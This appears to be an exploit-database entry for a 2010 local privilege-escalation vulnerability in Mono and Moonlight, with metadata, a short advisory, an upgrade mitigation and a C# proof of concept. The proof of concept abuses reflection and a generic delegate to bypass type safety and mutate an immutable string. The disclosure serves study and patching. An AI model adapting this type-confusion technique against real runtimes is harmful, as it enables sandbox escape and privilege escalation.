header-logo
Suggest Exploit
vendor:
Mono and Moonlight
by:
Chris Howie
7.2
CVSS
HIGH
Local Privilege-Escalation
264
CWE
Product Name: Mono and Moonlight
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Mono and Moonlight Local Privilege-Escalation Vulnerability

Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer. PoC code is provided in the text.

Mitigation:

Upgrade to the latest version of Mono and Moonlight to address this vulnerability.
Source

Exploit-DB raw data:

Sources:  https://www.chrishowie.com/2010/11/24/mutable-strings-in-mono/
https://www.securityfocus.com/bid/45051/info

Mono and Moonlight is prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer. 

PoC:

using System;
using System.Reflection;

public class FakeString {
    public int length;
    public char start_char;
}

public class TestCase {
    private static FakeString UnsafeConversion<T>(T thing)
        where T : FakeString
    {
        return thing;
    }

    public static void Main() {
        var a = "foo";
        var b = MakeMutable(a);

        Console.WriteLine(a);
        b.start_char = 'b';
        Console.WriteLine(a);
    }

    private static FakeString MakeMutable(string s)
    {
        var m = typeof(TestCase).GetMethod("UnsafeConversion", BindingFlags.NonPublic | BindingFlags.Static);
        var m2 = m.MakeGenericMethod(typeof(string));

        var d = (Func<string, FakeString>)Delegate.CreateDelegate(typeof(Func<string, FakeString>), null, m2);

        return d(s);
    }
}

Navigation

Suggest Exploit

Services By CQR